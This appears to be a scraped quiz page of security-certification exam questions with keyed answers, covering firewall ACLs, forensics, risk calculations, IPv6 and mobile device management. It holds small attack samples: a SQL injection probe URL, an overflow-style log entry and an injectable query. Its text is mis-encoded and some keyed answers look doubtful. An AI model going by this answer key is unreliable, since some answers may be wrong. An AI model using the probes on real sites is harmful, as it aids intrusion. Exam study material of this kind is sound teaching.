VPN users cannot access the active FTP server through the router but can access any server in the data center.Additional network information:DMZ network ñ 192.168.5.0/24 (FTP server is 192.168.5.11)VPN network ñ 192.168.1.0/24Datacenter ñ 192.168.2.0/24User network - 192.168.3.0/24HR network ñ 192.168.4.0/24\Traffic shaper configuration:VLAN Bandwidth Limit (Mbps)VPN50User175HR250Finance250Guest0Router ACL:ActionSourceDestinationPermit192.168.1.0/24192.168.2.0/24Permit192.168.1.0/24192.168.3.0/24Permit192.168.1.0/24192.168.5.0/24Permit192.168.2.0/24192.168.1.0/24Permit192.168.3.0/24192.168.1.0/24Permit192.168.5.1/32192.168.1.0/24Deny192.168.4.0/24192.168.1.0/24Deny192.168.1.0/24192.168.4.0/24DenyanyanyWhich of the following solutions would allow the users to access the active FTP server? Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network
Ann, a web developer, reports performance issues with her laptop and is not able to access any network resources. After further investigation, a bootkit was discovered and it was trying to access external websites. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO). Remove administrative access to local users Restrict/disable USB access
A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Each log below was collected from various security devices compiled from a report through the companyís security information and event management server.Logs:Log 1:Feb 5 23:55:37.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.2.5.81 3 packetsLog 2:HTTP://www.company.com/index.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaLog 3:Security Error AlertEvent ID 50: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the clientLog 4:Encoder oe = new OracleEncoder ();String query = ìSelect user_id FROM user_data WHERE user_name = ë î+ oe.encode ( req.getParameter(ìuserIDî) ) + ì ë and user_password = ë ì+ oe.encode ( req.getParameter(ìpwdî) ) +î ë ì;VulnerabilitiesBuffer overflowSQL injectionACLXSSWhich of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO). Log 2 Buffer overflow
A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. The security administrator is concerned with the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customersí data would take? key=NULL; for (int i =0; i<5000; i++){key=sha(key + password)}
After reviewing a companyís NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on the NFS export. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. Which of the following is true about the security controls implemented by the security administrator? Users with root access on remote NFS client computers can always use the SU command to modify other user's files on NAS
An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following matrix:DATA TYPECONFIDENTIALITYINTEGRITYAVAILABILITY----------------------------------------------------------------------------------------------------------------FinancialHIGHHIGHLOWClient nameMEDIUMMEDIUMHIGHClient addressLOWMEDIUMLOW-----------------------------------------------------------------------------------------------------------------AGGREGATEMEDIUMMEDIUMMEDIUM The auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score? A. HIGH, MEDIUM, LOW B. MEDIUM, MEDIUM, LOW C. HIGH, HIGH, HIGH D. MEDIUM, MEDIUM, MEDIUM HIGH, HIGH, HIGH
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future? A. Background checks B. Job rotation C. Least privilege D. Employee termination procedures Job Rotation
During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics evidence from the companyís database server. Which of the following is the correct order in which the forensics team should engage? Secure the scene, take inventory, capture volatile storage, capture non-volatile storage, document, and implant chain of custody
A security administrator has noticed that an increased number of employeesí workstations are becoming infected with malware. The company deploys an enterprise antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce malware infection? Block cloud-based storage software on the company network
Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based tools to identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used to help the security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE). Passive banner grabbing Nmap 09:1816.262743 IP (tos 0x0, ttl 64, id 9870, offset 0, flags [none], proto TCP (6), length 40) 192.168.1.3 1051 > 10.46.3.7.80: Flags [none], cksum 0x1800 (correct), win 512, length 0
A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit to the companyís internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of the following remote access solutions has the lowest technical complexity? A. RDP server B. Client-based VPN C. IPsec D. Jump box E. SSL VPN RDP server
The IT director has charged the company helpdesk with sanitizing fixed and removable media. The helpdesk manager has written a new procedure to be followed by the helpdesk staff. This procedure includes the current standard to be used for data sanitization, as well as the location of physical degaussing tools. In which of the following cases should the helpdesk staff use the new procedure? (Select three.). During asset disposal Before asset repurposing When media fails or is unusable
Since the implementation of IPv6 on the company network, the security administrator has been unable to identify the users associated with certain devices utilizing IPv6 addresses, even when the devices are centrally managed.en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500ether f8:1e:af:ab:10:a3inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5inet 192.168.1.14 netmask 0xffffff00 broadcast 192.168.1.255inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconfinet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporarynd6 options=1<PERFORMNUD>media: autoselectstatus: activeGiven this output, which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6 addresses in the future? (Select TWO). The router implement NDP The administrator must disable the IPv6 privacy extensions
ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counter-based codes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe? A. TOTP B. PAP C. CHAP D. HOTP HOTP
A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will be justified by having reduced the number of incidents and therefore saving on the amount spent investigating incidents.Proposal:External cloud-based software as a service subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum by 50%.The company currently has ten security incidents per annum at an average cost of $10,000 per incident. Which of the following is the ROI for this proposal after three years? A. -$30,000 B. $120,000 C. $150,000 D. $180,000 -$30,000
A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. Which of the following security technologies would BEST meet their requirements? (Select TWO). A. NIPS B. HSM C. HIPS D. NIDS E. WAF HIPS WAF
The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue? A. Race condition B. Click-jacking C. Integer overflow D. Use after free E. SQL injection Integer overflow
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bankís other systems through dedicated encrypted links. Which of the following is critical to ensure the successful management of system security concerns between the two organizations? A. ISA B. BIA C. MOU D. SOA E. BPA ISA
An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. After memory, which of the following BEST represents the remaining order of volatility that the investigator should follow? System processes, network processes, file system information, swap files and raw disk blocks
A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO). Perform a security risk assessment with recommended solutions to close off high-rated risks Determine if the information security standards have been complied with by the project
A company has noticed recently that its corporate information has ended up on an online forum. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO). Security awareness compliance training for all employees Implement DLP on the desktop, email gateway, and web proxies
An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. Which of the following security documents should be used to clarify the roles and responsibilities between the teams? A. BPA B. BIA C. MOU D. OLA MOU
A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two-week period and consequently have the following requirements:Requirement 1 ñ Ensure their server infrastructure operating systems are at their latest patch levelsRequirement 2 ñ Test the behavior between the application and databaseRequirement 3 ñ Ensure that customer data cannot be exfiltratedWhich of the following is the BEST solution to meet the above requirements? Perform dynamic code analysis, penetration test and run a vulnerability scanner
An insurance company has an online quoting system for insurance premiums. It allows potential customers to fill in certain details about their car and obtain a quote. During an investigation, the following patterns were detected:Pattern 1 ñ Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated.Pattern 2 ñ For every quote completed, a new customer number is created; due to legacy systems, customer numbers are running out.Which of the following is the attack type the system is susceptible to, and what is the BEST way to defend against it? (Select TWO). Resource exhaustion attack Implement an inline WAF and integrate into SIEM
A security tester is testing a website and performs the following manual query:https://www.comptia.com/cookies.jsp?products=5%20and%201=1The following response is received in the payload:ìORA-000001: SQL command not properly endedîWhich of the following is the response an example of? A. Fingerprinting B. Cross-site scripting C. SQL injection D. Privilege escalation Fingerprinting
An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? Configure the systems to ensure only necessary applications are able to run
An administrator believes that the web servers are being flooded with excessive traffic from time to time. The administrator suspects that these traffic floods correspond to when a competitor makes major announcements. Which of the following should the administrator do to prove this theory? Implement data analytics to try and correlate the occurrence times
A trucking company delivers products all over the country. The executives at the company would like to have better insight into the location of their drivers to ensure the shipments are following secure routes. Which of the following would BEST help the executives meet this goal? Implement geo-fencing to track products
A company has adopted a BYOD program. The company would like to protect confidential information. However, it has been decided that when an employee leaves, the company will not completely wipe the personal device. Which of the following would MOST likely help the company maintain security when employees leave? Utilize an MDM solution with containerization
An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent? IP spoofing attacks
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased? A. 0 B. 1 C. 3 D. 6 3
A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory. How might the administrator test that the strings are indeed encrypted in memory? Initiate a core dump of the application
An international shipping company discovered that deliveries left idle are being tampered with. The company wants to reduce the idle time associated with international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Which of the following should be implemented to help the company increase the security posture of its operations? A. Back office database B. Asset tracking C. Geo-fencing D. Barcode scanner Geo-fencing
The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer needed. Additionally, the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Which of the following should be implemented to ensure these processes can be automated? (Select THREE). Remote wiping MDM software Identity attestation
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE? A. $6,000 B. $24,000 C. $30,000 D. $96,000 $6,000
A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a limitation of this approach to risk management? Subjective and based on an individual's experience
Show full summary Hide full summary

Similar

CCNA Security 210-260 IINS - Exam 3
Mike M
CCNA Security Final Exam
Maikel Degrande
Spyware
Sam2
Professional, Legal, and Ethical Issues in Information Security
mfundo.falteni
Security Policies
indysingh7285
McAfee Advance Threat Defense - Training Quiz
esnlalan
CSS exam
Andy Oung
cyber security
Samuel Melendez
Cisco IT Essentials 7.0 | Chapter 13: Security Exam
dksajpigbdu asdfagdsga
Certified Information Systems Security Professional (CISSP)
GoAsk Chaz
FIT3031 - Network Security Exam Practice
Nicholas Bagnall